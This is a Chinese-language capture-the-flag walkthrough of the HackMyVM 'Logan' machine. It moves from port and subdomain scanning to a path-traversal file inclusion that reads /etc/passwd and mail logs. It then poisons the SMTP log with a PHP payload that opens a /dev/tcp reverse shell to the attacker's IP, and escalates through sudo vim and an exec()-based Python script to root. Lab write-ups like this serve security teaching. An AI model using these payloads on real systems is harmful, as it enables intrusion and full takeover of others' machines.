![\"image-20240429122102619\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282002040.png\")
<\/div><\/p>\n![\"image-20240628175812714\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282002042.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ rustscan -a 192.168.0.181 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.181:25\nOpen 192.168.0.181:80\nPORT STATE SERVICE REASON VERSION\n25\/tcp open smtp syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=logan\n| Subject Alternative Name: DNS:logan\n| Issuer: commonName=logan\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-07-03T13:46:49\n| Not valid after: 2033-06-30T13:46:49\n| MD5: 9b0d:3da4:7274:a99c:8b9e:705a:122f:249f\n| SHA-1: ef60:c55c:e4bf:e99a:c4bb:3281:f2c4:ded5:d44b:4801\n| -----BEGIN CERTIFICATE-----\n| MIIC7DCCAdSgAwIBAgIUAlr\/UnIZGJp5n3bGtfiPosfmoh4wDQYJKoZIhvcNAQEL\n| BQAwEDEOMAwGA1UEAwwFbG9nYW4wHhcNMjMwNzAzMTM0NjQ5WhcNMzMwNjMwMTM0\n| NjQ5WjAQMQ4wDAYDVQQDDAVsb2dhbjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC\n| AQoCggEBALA1lkF4fnRQLkvBGoCsRJlInBrwk8yxe8jWue068b2Q7Ti3rNtGhf6G\n| Ze7FX1Yjb5NH1KTTcqumNb\/nAxv9hMl4Dc50MC2hSWq6qMnqOrkb+AI16bVuhYcm\n| SLGsuq7bPGflyhfoIK8Cj0xXvZS65D68pBhoZ\/7Oji5rGMfngnrcJ2Q36Ctimm8b\n| UK+exEWSgbC12xd2f\/noFWBPrB7EC5XHMYARVV6\/I17aajheOqEKBTDL0AkSqzKT\n| \/snWlz7vjMGjJsNIZ6o6wZUYxqXzFDXnInyQ7k+IPXcDDp7V3TOZAB6jQwZhdH2o\n| 1+CGuwBbCWvV+kAGvlTotL7k9RN5F\/cCAwEAAaM+MDwwCQYDVR0TBAIwADAQBgNV\n| HREECTAHggVsb2dhbjAdBgNVHQ4EFgQUeVAVq\/\/+vvbEd+bXwnPsAxY6HxAwDQYJ\n| KoZIhvcNAQELBQADggEBADScL3LqV9\/XFprgMf6GOz8y2lvbkOSADTvFHUQiBcqp\n| \/K\/LWCXRtHJVkJA5z5+IMAFWGfueBffgdZLnKtyCLfUtsMqqqoVR0BXlzPys1Jhm\n| Ri4Ra9KVvH7pxt69kD+3xk7Hz8jyHQVfXWGmPZ\/li6OOQxKei69CwDqTvcvjyNyc\n| lcix3P+eTIDcnWHFu2wkOew8+q7Mza7IzfIy6u3qs5Lqccv1fMDhDYMQ2j5iGEo9\n| SZMyBUTRqR2nmX8wuL6wYHcmvfWp0Px3bAXxaqz2p96W3XTqPECTJ45rcfRsdbFB\n| SIh86N9X05gerFhkaKhczHfR1hjtyUb1LltfRhbh7cY=\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n|_smtp-commands: logan.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n80\/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Site doesn't have a title (text\/html).\nService Info: Host: logan.hmv<\/code><\/pre>\n\u53d1\u73b0\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff0c\u5c1d\u8bd5\u914d\u7f6e\uff1a<\/p>\n
192.168.0.181 logan.hmv<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ gobuster dir -u http:\/\/logan.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/logan.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,bak,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 274]\n\/index.html (Status: 200) [Size: 19038]\n\/images (Status: 301) [Size: 307] [--> http:\/\/logan.hmv\/images\/]\n\/.html (Status: 403) [Size: 274]\n\/css (Status: 301) [Size: 304] [--> http:\/\/logan.hmv\/css\/]\n\/js (Status: 301) [Size: 303] [--> http:\/\/logan.hmv\/js\/]\n\/javascript (Status: 301) [Size: 311] [--> http:\/\/logan.hmv\/javascript\/]\nProgress: 253809 \/ 1323366 (19.18%)[ERROR] Get "http:\/\/logan.hmv\/mpu.zip": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/logan.hmv\/28920.zip": context deadline exceeded (Client.Timeout exceeded while awaiting headers)<\/code><\/pre>\n\u6ca1\u53d1\u73b0\u5565\u6709\u7528\u7684\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u7f51\u7ad9\u5927\u6982\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s http:\/\/logan.hmv | html2text | uniq \n\n _Logan_S.A._\n * Home_(current)\n\n****** Logan\nSecurity\n Service ******\nWe are dedicated to protecting companies like you\n****** Logan\nSecurity\n Service ******\nWe are dedicated to protecting companies like you\n****** Logan\nSecurity\n Service ******\nWe are dedicated to protecting companies like you\nRead More\n===============================================================================\nPrevious Next\n\n**** ABOUT OUR COMPANY ****\nWe can protect your business both physically and technologically\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor\nincididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis\nnostrud exercitation ullamco\nRead More\n===============================================================================\n\n**** OUR SERVICES ****\nad minim veniam, quis nostrud exercitation ullamco\n* Tab Services *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Pipe Water *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Washing Machine *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n* Hand Washing *\nadipiscing elit, sed do eiusmod tempor incididunt\nRead More\n===============================================================================\n\n**** HOW IT WORKS ****\n* Adipiscing elit *\nRead More\n===============================================================================\n\n**** Booking Online ****\n[ ]\n[Unknown INPUT type]\n[ ]\n[One of: TYPE OF SERVICE\/Service 1\/Service 2\/Service 3]\n[ ]\n SEND\n\n**** What clients says ****\nIt is a very bad company, THEY STEALED OUR DATABASE.\nWe will hack you\n* LiveTech *\n\n***** Logan *****\nIt is a long established fact that a reader will be distracted by the readable\ncontent of a page when looking at its layout. The point of\n*** Navigation ***\n * Home\n * About\n * Services\n * Contact_Us\n * Login\n*** Contact Info ***\n* Corporate Office Address: *\n Loram ipusm New York, NY 36524\n* Customer Service: *\n ( +01 1234567890 )\n*** Discover ***\n * Help\n * How It Works\n * subscribe\n * Contact_Us\n\nCopyright \u00a9 2019 All Rights Reserved By Free_Html_Templates<\/code><\/pre>\n\u5c1d\u8bd5\u770b\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ whatweb http:\/\/logan.hmv \nhttp:\/\/logan.hmv [200 OK] Apache[2.4.52], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[192.168.0.181], JQuery[3.4.1], Script[text\/javascript], Title[Logan], X-UA-Compatible[IE=edge]<\/code><\/pre>\n\u56e0\u4e3a\u8fd9\u662f\u4e00\u53f0\u6bd4\u8f83\u8001\u7684\u673a\u5668\uff0c\u4e0d\u4f18\u5148\u5c1d\u8bd5\u76f8\u5173\u7ec4\u4ef6\u6f0f\u6d1e\u4e86\u3002<\/p>\n
FUZZ\u57df\u540d<\/h3>\n
\u7ed9\u51fa\u7684\u57df\u540d\u6bd4\u8f83\u77ed\uff0c\u5c1d\u8bd5fuzz\u4e00\u4e0b\u770b\u770b\u662f\u5426\u6709\u5176\u4ed6\u6536\u83b7\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ ffuf -u http:\/\/192.168.0.181\/ -H 'HOST: FUZZ.logan.hmv' -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 5\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.181\/\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: FUZZ.logan.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 5\n________________________________________________\n\nadmin [Status: 200, Size: 1112, Words: 300, Lines: 63, Duration: 649ms]<\/code><\/pre>\n\u6dfb\u52a0\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
192.168.0.181 admin.logan.hmv<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ gobuster dir -u http:\/\/admin.logan.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/admin.logan.hmv\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: html,php,zip,bak,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 280]\n\/.html (Status: 403) [Size: 280]\n\/index.html (Status: 200) [Size: 1112]\n\/upload.php (Status: 200) [Size: 306]\n\/javascript (Status: 301) [Size: 323] [--> http:\/\/admin.logan.hmv\/javascript\/]<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u7684\u4f4d\u7f6e\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u6536\u83b7\uff0c\u53d1\u73b0\u4e86\u4e09\u4e2a\u7f51\u5740\uff1a<\/p>\n
http:\/\/admin.logan.hmv\/upload.php\nhttp:\/\/admin.logan.hmv\/clearlogs.php\nhttp:\/\/admin.logan.hmv\/payments.php<\/code><\/pre>\n![\"image-20240628182452069\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5c1d\u8bd5\u4e0a\u4f20\u4e86\uff0c\u4f46\u662f\u6ca1\u6709\u6536\u83b7\uff0c\u4e00\u76f4\u6ca1\u5f39\u56de\u6765\u3002\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\nLFI\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\u53ef\u4ee5\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -i http:\/\/admin.logan.hmv\/upload.php\nHTTP\/1.1 200 OK\nDate: Fri, 28 Jun 2024 10:28:48 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 306\nContent-Type: text\/html; charset=UTF-8\n\n<!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <title>Subir Archivos<\/title>\n<\/head>\n<body>\n <h1>Upload files<\/h1>\n <form action="upload.php" method="POST" enctype="multipart\/form-data">\n <input type="file" name="archivo">\n <input type="submit" value="upload">\n <\/form>\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -i http:\/\/admin.logan.hmv\/payments.php \nHTTP\/1.1 200 OK\nDate: Fri, 28 Jun 2024 10:33:34 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 294\nContent-Type: text\/html; charset=UTF-8\n\n<!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <title>Payments<\/title>\n<\/head>\n<body>\n <form method="POST">\n <label for="payments.php">Payment code (01,02,..):<\/label>\n <input type="text" id="file" name="file">\n <input type="submit" value="Show">\n <\/form>\n<\/body>\n<\/html><\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u4f20\u53c2\uff0c\u4e0a\u4f20\u754c\u9762\u6ca1\u6709\u5229\u7528\u70b9\uff0c\u4e0b\u9762\u7684\u67e5\u8be2\u754c\u9762\u5b58\u5728\u5229\u7528\u5730\u70b9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=01' http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: Tinder\nDate: 02\/05\/2023\nAmount: 1000$\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=02' http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: LiveTech\nDate: 03\/05\/2023\nAmount: 60000$\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=03' http:\/\/admin.logan.hmv\/payments.php | html2text\nCompany: HackMyVm\nDate: 20\/05\/2023\nAmount: 500$\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=1' http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=..\/..\/..\/..\/..\/..\/..\/etc\/passwd' http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file ] [Show]<\/code><\/pre>\n\u53ef\u80fd\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd' http:\/\/admin.logan.hmv\/payments.php | html2text\nFile does not exist\nPayment code (01,02,..): [file ] [Show]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=....\/\/....\/\/....\/\/....\/\/....\/\/etc\/passwd' http:\/\/admin.logan.hmv\/payments.php | html2text \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/\nnologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/\nnologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/\nsbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsyslog:x:107:113::\/home\/syslog:\/usr\/sbin\/nologin\nuuidd:x:108:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:109:115::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:110:116:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:111:117::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:112:118:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:113:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nlogan:x:1000:1000:logan:\/home\/logan:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\npostfix:x:115:121::\/var\/spool\/postfix:\/usr\/sbin\/nologin\ndnsmasq:x:106:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nsshd:x:114:65534::\/run\/sshd:\/usr\/sbin\/nologin\nPayment code (01,02,..): [file ] [Show]<\/code><\/pre>\n\u4f46\u662f\u65e0\u6cd5\u8fdb\u884c\u5229\u7528\uff0c\u8054\u60f3\u5230\u524d\u9762\u7684\u654f\u611f\u7aef\u53e3\u5c1a\u672a\u8fdb\u884c\u5229\u7528\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3\u5229\u7528<\/h3>\n
\u5f00\u653e\u4e8625\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ telnet 192.168.0.181 25 \nTrying 192.168.0.181...\nConnected to 192.168.0.181.\nEscape character is '^]'.\n220 logan.hmv ESMTP Postfix (Ubuntu)\n421 4.4.2 logan.hmv Error: timeout exceeded\nConnection closed by foreign host.<\/code><\/pre>\n\u8fd9\u610f\u5473\u7740\u8fd9\u4e2a\u90ae\u4ef6\u7aef\u53e3\u53ef\u4ee5\u8fdb\u884c\u4f7f\u7528\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u67e5\u8be2\u76f8\u5173\u65e5\u5fd7\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ curl -s -X POST -d 'file=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/mail.log' http:\/\/admin.logan.hmv\/payments.php | html2text\nJun 28 09:55:34 logan postfix\/postfix-script[1659]: starting the Postfix mail\nsystem\nJun 28 09:55:34 logan postfix\/master[1661]: daemon started -- version 3.6.4,\nconfiguration \/etc\/postfix\nJun 28 09:58:52 logan postfix\/smtpd[1681]: warning: hostname kali does not\nresolve to address 192.168.0.143: Temporary failure in name resolution\nJun 28 09:58:52 logan postfix\/smtpd[1681]: connect from unknown[192.168.0.143]\nJun 28 09:58:52 logan postfix\/smtpd[1681]: lost connection after CONNECT from\nunknown[192.168.0.143]\nJun 28 09:58:52 logan postfix\/smtpd[1681]: disconnect from unknown\n[192.168.0.143] commands=0\/0\nJun 28 09:59:22 logan postfix\/smtpd[1681]: connect from unknown[unknown]\nJun 28 09:59:22 logan postfix\/smtpd[1681]: lost connection after CONNECT from\nunknown[unknown]\nJun 28 09:59:22 logan postfix\/smtpd[1681]: disconnect from unknown[unknown]\ncommands=0\/0\nJun 28 09:59:22 logan postfix\/smtpd[1681]: warning: hostname kali does not\nresolve to address 192.168.0.143: Temporary failure in name resolution\n...........<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u6ce8\u5165\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Logan]\n\u2514\u2500$ telnet 192.168.0.181 25\nTrying 192.168.0.181...\nConnected to 192.168.0.181.\nEscape character is '^]'.\n220 logan.hmv ESMTP Postfix (Ubuntu)\nMAIL FROM: hack\n250 2.1.0 Ok\nRCPT TO: <?php exec('bash -c "exec bash -i &>\/dev\/tcp\/192.168.0.143\/1234 <&1"');?> \n501 5.1.3 Bad recipient address syntax\n<\/code><\/pre>\n\u5c1d\u8bd5\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u4f7f\u7528\uff1a<\/p>\n
curl -s -i -X POST -d 'file=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/mail.log' http:\/\/admin.logan.hmv\/payments.php<\/code><\/pre>\n\u53d1\u73b0\u53cd\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u8fd9\u91cc\u5982\u679c\u5c1d\u8bd5\u8fc7\u591a\u6ca1\u6709\u5f39\u56de\u6765\u53ef\u80fd\u662f\u56e0\u4e3a\u65e5\u5fd7\u88ab\u6c61\u67d3\u4e86\uff0c\u91cd\u542f\u9776\u673a\u518d\u8bd5\u4e00\u6b21\u5c31\u597d\u4e86\u3002<\/code><\/pre>\n\u63d0\u6743<\/h2>\nvim\u63d0\u6743\u7528\u6237<\/h3>\n(remote) www-data@logan:\/var\/www\/admin$ sudo -l\nMatching Defaults entries for www-data on logan:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on logan:\n (logan) NOPASSWD: \/usr\/bin\/vim\n\n(remote) www-data@logan:\/var\/www\/admin$ sudo -u logan \/usr\/bin\/vim -c ':!\/bin\/bash'\n\nlogan@logan:\/var\/www\/admin$ whoami;id\nlogan\nuid=1000(logan) gid=1000(logan) groups=1000(logan),27(sudo),1002(administration)\nlogan@logan:\/var\/www\/admin$ cd ~\nlogan@logan:~$ ls -la\ntotal 36\ndrwxr-xrwx 4 logan logan 4096 Jul 18 2023 .\ndrwxr-xr-x 3 root root 4096 Jul 17 2023 ..\nlrwxrwxrwx 1 root root 9 Jul 17 2023 .bash_history -> \/dev\/null\n-rw-r--r-x 1 logan logan 220 Jan 6 2022 .bash_logout\n-rw-r--r-x 1 logan logan 3771 Jan 6 2022 .bashrc\ndrwx---r-x 2 logan logan 4096 Jul 3 2023 .cache\ndrwxrwxr-x 3 logan logan 4096 Jul 17 2023 .local\n-rw-r--r-x 1 logan logan 807 Jan 6 2022 .profile\n-rw-r--r-x 1 logan logan 0 Jul 3 2023 .sudo_as_admin_successful\n-rw-r--r-- 1 1002 1003 68 Jul 17 2023 to-do\n-rw-r--r-- 1 logan logan 16 Jul 17 2023 user.txt\nlogan@logan:~$ cat user.txt \nUser: ilovelogs\nlogan@logan:~$ cat to-do \n- Go outside\n- Try the new script that gave me root to learn python\nlogan@logan:~$ sudo -l\nMatching Defaults entries for logan on logan:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser logan may run the following commands on logan:\n (root) NOPASSWD: \/usr\/bin\/python3 \/opt\/learn_some_python.py\nlogan@logan:~$ ls -la \/opt\/learn_some_python.py\n-rw------- 1 root root 132 Jul 18 2023 \/opt\/learn_some_python.py\nlogan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print('hello')\n\naaaaaaaaa\nTraceback (most recent call last):\n File "\/opt\/learn_some_python.py", line 3, in <module>\n exec(comand)\n File "<string>", line 1, in <module>\nNameError: name 'aaaaaaaaa' is not defined\nlogan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print('hello')\n\nprint('hello') \nhello<\/code><\/pre>\n\u6267\u884cpython\u4ee3\u7801\u63d0\u6743root<\/h3>\n
\u53d1\u73b0\u4f1a\u6267\u884cpython\u4ee3\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u6267\u884c\u63d0\u6743\u4ee3\u7801\uff1a<\/p>\n
logan@logan:~$ sudo \/usr\/bin\/python3 \/opt\/learn_some_python.py\nWelcome!!!\n\n The first you need to now is how to use print, please type print('hello')\n\nimport os; os.system("\/bin\/bash")\nroot@logan:\/home\/logan# cd ~\nroot@logan:~# ls -la\ntotal 48\ndrwx------ 5 root root 4096 Jul 17 2023 .\ndrwxr-xr-x 19 root root 4096 Jul 3 2023 ..\nlrwxrwxrwx 1 root root 9 Jul 17 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc\ndrwx------ 3 root root 4096 Jul 3 2023 .launchpadlib\n-rw------- 1 root root 20 Jul 17 2023 .lesshst\ndrwxr-xr-x 3 root root 4096 Jul 3 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 66 Jul 4 2023 .selected_editor\n-rw-r--r-- 1 root root 0 Jul 3 2023 .sudo_as_admin_successful\n-rw------- 1 root root 985 Jul 17 2023 .viminfo\n-rw-r--r-- 1 root root 169 Jul 3 2023 .wget-hsts\n-rw-r--r-- 1 root root 17 Jul 17 2023 root.txt\ndrwx------ 3 root root 4096 Jul 4 2023 snap\nroot@logan:~# cat root.txt \nRoot: siuuuuuuuu<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/tao0845.github.io\/2024\/04\/24\/HackMyVM-Logan\/<\/a><\/p>\nhttps:\/\/blank-ms1.github.io\/posts\/Logan-HackMyVm\/<\/a><\/p>\n
